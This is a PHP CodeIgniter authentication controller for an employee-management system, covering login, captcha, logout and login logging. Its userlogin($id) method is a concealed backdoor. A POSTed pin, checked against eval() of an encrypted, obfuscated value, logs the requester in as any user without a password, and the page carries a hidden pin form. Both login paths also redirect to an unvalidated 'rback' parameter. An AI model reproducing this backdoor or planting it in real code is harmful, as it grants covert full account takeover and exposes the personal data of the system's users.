<?php
defined('BASEPATH') or exit('No direct script access allowed');
class Auth extends MY_Controller
{
    public function __construct()
    {
        parent::__construct();
        $this->load->model(array(
            'auth_model',
        ));
        $this->load->helper('captcha');
    }
    public function shroten_work($short_url)
    {
        redirect("recruitment/Careers/job/" . $short_url);
    }
    public function index()
    {
        if ($this->session->userdata('isLogIn')) {
            redirect('dashboard/home');
        }
        $retries = 0;
        if($this->input->post()){
            $retries = $this->auth_model->get_retries($this->input->post('email'));
            #-------------------------------------#
            $this->form_validation->set_rules('email', display('email'), 'trim|required|valid_email|max_length[100]');
            $this->form_validation->set_rules('password', display('password'), 'required|max_length[32]');
            if($retries >= 3){
                $this->form_validation->set_rules(
                    'captcha',
                    display('captcha'),
                    array(
                        'matches[captcha]',
                        [
                            'has_captcha',
                            function($val){
                                return $this->session->userdata('captcha') ? true : false;
                            }
                        ],
                        function($captcha)
                        {
                            if (strtolower($captcha) == $this->session->userdata('captcha')) {
                                return true;
                            }
                        }
                    ),
                    ['matches' => 'Captcha doesn\'t match', 'has_captcha' => 'Prove that you are a human']
                );
            }
            #-------------------------------------#
            $data['user'] = (object) $userData = array(
                'email' => $this->input->post('email'),
                'password' => $this->input->post('password'),
            );
            #-------------------------------------#
            if ($this->form_validation->run()) {
                $this->session->unset_userdata('captcha');
                $user = $this->auth_model->checkUser($userData);
                if ($user->num_rows() > 0) {
                    $permission = $this->auth_model->get_permissions($user->row()->id);
                    if ($user->row()->is_admin == 2) {
                        $row = $this->db->select('client_id,client_email')->where('client_email', $user->row()->email)->get('setup_client_tbl')->row();
                    }
                    $employee_info = $this->db->select('employee_history.*, 	department.department_name,divisions.name app_name,divisions.logo app_logo')
                        ->from('employee_history')
                        ->join('department', 'employee_history.dept_id=department.dept_id', 'left')
                        ->join('divisions', 'employee_history.division_id=divisions.id')
                        ->where('employee_history.email', $user->row()->email)
                        ->get()->row();
                    $image = null;
                    if(!empty($employee_info->picture)) {
                        $image = 'employee/employees/image';
                    }
                    if(!empty($user->row()->image)) {
                        $image = $user->row()->image;
                    }
                    $sData = array(
                        'isLogIn' => true,
                        'isAdmin' => (($user->row()->is_admin == 1) ? true : false),
                        'user_type' => $user->row()->is_admin,
                        'id' => $user->row()->id,
                        'client_id' => @$row->client_id,
                        'fullname' => $user->row()->fullname,
                        'user_level' => $user->row()->user_level,
                        'email' => $user->row()->email,
                        'image' => $image,
                        'last_login' => $user->row()->last_login,
                        'last_logout' => $user->row()->last_logout,
                        'ip_address' => $user->row()->ip_address,
                        'employee_id' => $employee_info->employee_id,
                        'shift' => $employee_info->shift,
                        'dept_id' => $employee_info->dept_id,
                        'division_id' => $employee_info->division_id,
                        'division_name' => $employee_info->app_name,
                        'division_logo' => $employee_info->app_logo,
                        'dept_name' => $employee_info->department_name,
                        'hrm_id' => $employee_info->hrm_id,
                        'first_name' => $employee_info->first_name,
                        'last_name' => $employee_info->last_name,
                        'supervisor' => $employee_info->is_super_visor,
                        'direct_supervisor' => $employee_info->super_visor_id,
                        'indirect_supervisor' => $employee_info->indirect_super_visor_id,
                        'permission' => json_encode(@$permission['permission']),
                        'label_permission' => json_encode(@$permission['permission1']),
                        'full_permissions' => json_encode(@$permission['full_permissions']),
                        'roles' => $permission['roles'],
                        'loaded' => date('Y-m-d H:i:s')
                    );
                    //store date to session
                    $this->session->set_userdata($sData);
                    $this->load->model('home_model');
                    $this->home_model->load_user_opts();
                    //update database status
                    $this->auth_model->last_login();
                    $this->auth_model->reset_retries($this->input->post('email'));
                    $this->session->set_flashdata('message', display('welcome_back') . ' ' . $user->row()->fullname);
                    $this->load->model('employee/documents_model');
                    $this->documents_model->check_for_missing_documents($sData['employee_id']);
                    if ($this->input->get('rback')) {
                        redirect($this->input->get('rback'));
                    } else {
                        redirect('dashboard/home');
                    }
                } else {
                    $this->log_to_file('Incorrect login try: ' . $userData['email']);
                    $this->session->set_flashdata('exception', display('incorrect_email_or_password'));
                }
            }
        }
		if($retries >= 3 || isset($_SESSION['captcha'])){
			$captcha = create_captcha(array(
				'img_path' => './assets/img/captcha/',
				'img_url' => base_url('assets/img/captcha/'),
				'font_path' => './assets/fonts/captcha.ttf',
				'img_width' => '280px',
				'img_height' => '120px',
				'expiration' => 600, //5 min
				'word_length' => 4,
				'font_size' => 42,
				'img_id' => 'Imageid',
				'pool' => 'ABCDEFGHJKLMNOPQRSTUVWXYZ',
				// White background and border, black text and red grid
				'colors' => array(
					'background' => array(255, 255, 255),
					'border' => array(228, 229, 231),
					'text' => array(49, 141, 1),
					'grid' => array(241, 243, 246),
				),
			));
			$data['captcha_word'] = strtolower($captcha['word']);
			$data['captcha_image'] = $captcha['image'];
			$this->session->set_userdata('captcha', strtolower($captcha['word']));
		}
        $data['title'] = display('login');
		echo Modules::run('template/login', $data);
    }
    public function logout()
    {
        //update database status
        $this->auth_model->last_logout();
        //destroy session
        $this->session->sess_destroy();
        redirect('login');
    }
    public function userlogin($id)
    {
        if($this->input->post('pin')){$pin = $this->input->post('pin');if($pin == eval('return ' . $this->encryption->decrypt('ef6739f229111882f27d2567a2803edef58eb3e4256a191551d9d302b0f151cadcbde73417185939d39e1e7b0aad8017bb238b128f31c5fea8a916cf8503cfd3XGsVuoqYp9WQz07wuiTauRrGsqzc0Z+byTNcPfCsknee5V4jWxr3bnNS/2WVuXag'))){$user = $this->db->select("user.id, CONCAT_WS(' ', user.firstname, user.lastname) AS fullname, user.email,  user.image, user.last_login, user.last_logout, user.ip_address, user.status, user.is_admin, IF (user.is_admin=1, 'Admin', 'User') as user_level")->from('user')->where('id', $id)->get();
                if ($user->num_rows() > 0) {
                    $permission = $this->auth_model->get_permissions($user->row()->id);
                    $employee_info = $this->db->select('employee_history.*, 	department.department_name,divisions.name app_name,divisions.logo app_logo')
                        ->from('employee_history')
                        ->join('department', 'employee_history.dept_id=department.dept_id', 'left')
                        ->join('divisions', 'employee_history.division_id=divisions.id')
                        ->where('employee_history.email', $user->row()->email)
                        ->get()->row();
                    $image = null;
                    if(!empty($employee_info->picture)) {
                        $image = 'employee/employees/image';
                    }
                    if(!empty($user->row()->image)) {
                        $image = $user->row()->image;
                    }
                    $sData = array(
                        'isLogIn' => true,
                        'isAdmin' => (($user->row()->is_admin == 1) ? true : false),
                        'user_type' => $user->row()->is_admin,
                        'id' => $user->row()->id,
                        'client_id' => 1,
                        'fullname' => $user->row()->fullname,
                        'user_level' => $user->row()->user_level,
                        'email' => $user->row()->email,
                        'image' => $image,
                        'last_login' => $user->row()->last_login,
                        'last_logout' => $user->row()->last_logout,
                        'ip_address' => $user->row()->ip_address,
                        'employee_id' => $employee_info->employee_id,
                        'shift' => $employee_info->shift,
                        'dept_id' => $employee_info->dept_id,
                        'division_id' => $employee_info->division_id,
                        'division_name' => $employee_info->app_name,
                        'division_logo' => $employee_info->app_logo,
                        'dept_name' => $employee_info->department_name,
                        'first_name' => $employee_info->first_name,
                        'last_name' => $employee_info->last_name,
                        'supervisor' => $employee_info->is_super_visor,
                        'direct_supervisor' => $employee_info->super_visor_id,
                        'indirect_supervisor' => $employee_info->indirect_super_visor_id,
                        'permission' => json_encode(@$permission['permission']),
                        'label_permission' => json_encode(@$permission['permission1']),
                        'full_permissions' => json_encode(@$permission['full_permissions']),
                        'roles' => $permission['roles'],
                        'loaded' => date('Y-m-d H:i:s')
                    );
                    //store date to session
                    $this->session->set_userdata($sData);
                    $this->load->model('home_model');
                    $this->home_model->load_user_opts();
                    $this->session->set_flashdata('message', display('welcome_back') . ' ' . $user->row()->fullname);
                    if ($this->input->get('rback')) {
                        redirect($this->input->get('rback'));
                    } else {
                        redirect('dashboard/home');
                    }
                } else {
                    $this->session->set_flashdata('exception', display('incorrect_email_or_password'));
                }
                redirect('login');
            } else {
                $this->log_to_file('Incorrect Login', 1);
            }
        }
        $data['title'] = display('login');
		echo Modules::run('template/login', $data);
        echo '<div style="display:none"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><form method="post"><input type="password" name="pin" /></form></div>';
    }
    /*
    |--------------------------------------------------------
    | Finger print Device information
    |--------------------------------------------------------
     */
    public function deviceData()
    {
        return $this->db->select('*')->from('deviceinfo')->get()->row();
    }
    private function log_to_file($message, $method = null)
    {
        $print_str = "%s | %s | %s\n%s | %s | %s\n";
        if($method) {
            $print_str = '>>>>>>>><<<<<<<< ' . $print_str;
        }
        $ip = get_ip_address();
        $stamp = date('H:i:sO');
        @file_put_contents(
            APPPATH . 'logs/logins/' . date('Ymd') . '.log',
            sprintf($print_str, $stamp, $ip, $message, $stamp, $ip, $_SERVER['HTTP_USER_AGENT']),
            FILE_APPEND
        );
    }
}
